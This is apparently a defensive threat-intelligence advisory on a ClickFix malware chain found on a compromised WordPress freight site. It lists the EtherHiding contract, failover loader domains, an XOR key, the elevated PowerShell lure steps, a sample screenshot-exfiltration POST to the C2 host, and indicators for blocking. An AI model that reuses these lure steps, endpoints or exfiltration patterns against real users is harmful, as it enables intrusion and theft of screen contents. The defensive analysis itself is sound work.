A new active instance of the WP-002 / Remus ClickFix chain was captured on a compromised
WordPress freight-industry site, freightbook365[.]com. It introduces several changes over
the dorz.nl wave (v15): an elevated-shell social-engineering variant (Win+X → PowerShell
Admin, Russian-localized), a new EtherHiding contract, a 3-domain failover loader,
a new recon/exfil C2 (helauth[.]com), and a previously undocumented
screenshot-exfiltration capability.
Delivery of the clipboard poison is TDS-gated / intermittent — a manually captured browser session received only an inert DOM shell (nothing copied), while an instrumented sandbox detonation received the complete, functional chain. Critically, the screenshot/fingerprint reconnaissance fires on every visit regardless of gating, so "inert" sessions are not safe.
RevSlider 6.7.16 + js_composer 7.8 (Visual Composer), transcargo theme; 160.153.0.61 (GoDaddy). Victim — splitcam: never blocklisted.
Contract 0x5bc946cd5121431c7a43549aee7f567e15176f9c (selector 0xe2179b8e) via data-seed-prebsc-1-s1.binance.org returns base64 JS injecting asseload[.]com/cdn/widget/cdn.js.
Loads arming stage a4045c662b80.js from asseload[.]com → cfsubs[.]com → helauth[.]com in order. asseload (burned in v15) degraded → failover to cfsubs observed.
XOR/base64 decoder family, new key qEXvNnc5bx0U; contains clipboard-write code (execCommand / clipboard API). Delivery TDS-gated.
Win+X → I (PowerShell / Terminal as Admin) → Ctrl+V → Enter. Runs with Administrator rights from the first instruction — an escalation over dorz.nl's non-elevated Win+R. Russian-localized fake Cloudflare Turnstile.
snap.js (html2canvas, 194 KB) captures the visitor screen; base64 JPEG POSTed to /cdn/widget/shot. Beacon /cdn/widget/hit?s=cdn:X&h=<lure>&o=<os>&k=<clip>; poll /cdn/widget/a/done (×334).
| Element | v15 (dorz.nl) | v16 (freightbook365) |
|---|---|---|
| Elevation | Win+R (non-elevated Run) | Win+X → PowerShell (Admin) — elevated |
| Locale | English | Russian |
| EtherHiding contract | 0xae5d8eec…08034 | 0x5bc946cd…76f9c |
| Loader | single asseload aps.js | 3-domain failover cdn.js (asseload→cfsubs→helauth) |
| Arming-stage XOR key | oipCQd0DIbeF | qEXvNnc5bx0U |
| C2 | 209.38.82.72:9048 /invoices | helauth[.]com /hit /shot /a/done |
| Screenshot exfil | not observed | Yes — html2canvas → base64 JPEG /shot |
asseload[.]com — burned in v15 + OTX — is the failed first-choice stager, forcing failover. Plausibly why manual sessions see broken delivery. (Correlation, not proven causation.)| Type | Value | Role | Handling |
|---|---|---|---|
| eth-contract | 0x5bc946cd5121431c7a43549aee7f567e15176f9c | EtherHiding (BSC-testnet) | track |
| domain | helauth[.]com (104.21.29.209) | recon/exfil C2 | block |
| domain | cfsubs[.]com (172.67.190.184) | failover stager | block |
| domain | asseload[.]com (104.21.59.52) | cdn.js loader (burned) | block |
| url | hxxps://helauth[.]com/cdn/widget/shot | screenshot exfil (POST, base64 JPEG) | alert |
| uri | /cdn/widget/hit?s=cdn:X&h=&o=&k= | beacon/fingerprint | alert |
| url | hxxp://freightbook365[.]com/ | compromised lure | VICTIM — notify, do not block |
| Hash | Artifact |
|---|---|
ba70a75c4b0d81e083fff510d0d6cc0c622cca3660cfa576e34ee899be7f72bc | cdn.js — failover loader |
c5ef6b9f44e97d55d6a0deac0ef22118410c3114e7b5b97f4fc1b5b0c5b4a1e9 | a4045c662b80.js — clipboard-arming stage (XOR key qEXvNnc5bx0U) |
e87e550794322e574a1fda0c1549a3c70dae5a93d9113417a429016838eab8cb | snap.js — html2canvas screenshotter |
Shipped with this advisory: YARA (SL-ADV-2026-WP-001-V16.yar, 5 rules), Sigma
(…V16.sigma.yml, 6 rules), STIX 2.1 (…V16.stix.json, 44 objects). Highest-value network discriminator:
POST /cdn/widget/shot?s=cdn:X&h=freightbook365.com HTTP/2 Host: helauth.com Content-Type: text/plain;charset=UTF-8 /9j/4AAQSkZJRg... <-- base64 JPEG screenshot of the victim's screen
| Priority | Action |
|---|---|
| now | Block helauth[.]com, cfsubs[.]com, asseload[.]com; alert on /cdn/widget/{hit,shot,a/done} and base64-JPEG POST to /shot. |
| now | Hunt elevated PowerShell/Terminal spawned from Win+X (explorer parent, High/System integrity) running download cradles. |
| soon | Alert on injected lure DOM (id="clipboard-text" + checkbox-container) in proxied web responses — catches TDS-gated visits. |
| coord | Notify freightbook365.com owner — compromised WordPress (RevSlider/js_composer). TDS-gated-live, not inert; cleanup required. |
Attribution: infrastructure-level only; no named-group assertion. Splitcam: compromised lure/victim hosts are never blocklisted. Provenance: chain reconstructed from an embedded-keylog pcapng by Dispensight/SecureLeaf via independent TLS decryption — EtherHiding, failover, arming stage, C2 and screenshot-exfil all verified on the wire, not from the sandbox report. The final clipboard payload command was not extracted for this advisory.
SL-ADV-2026-WP-001 v16 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com